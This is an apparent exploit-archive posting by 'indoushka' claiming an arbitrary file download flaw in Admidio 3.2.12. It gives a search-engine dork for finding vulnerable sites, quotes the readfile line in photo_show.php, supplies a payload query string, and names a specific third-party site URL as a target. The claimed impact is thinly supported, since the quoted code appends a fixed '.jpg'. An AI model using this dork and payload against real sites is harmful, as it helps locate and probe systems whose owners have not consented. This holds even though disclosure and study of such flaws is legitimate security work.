============================================================================================================================
| # Title : Admidio 3.2.12 Arbitrary File Download Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Fr V.(Pro) |
| # Vendor : https://www.admidio.org/ |
| # Dork : "© 2004 - 2017 Admidio Team" |
============================================================================================================================
poc :
adm_program\modules\photos\photo_show.php
line 105
readfile($ordner.'/thumbnails/'.$getPhotoNr.'.jpg');
[+] Dorking İn Google Or Other Search Enggine .
[+] use payload : modules/photos/photo_show.php?pho_id=0&photo_nr=1&thumb=1
http://www.cvjm-reutlingen.de/admidio/adm_program/modules/photos/photo_show.php?pho_id=0&photo_nr=1&thumb=1
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================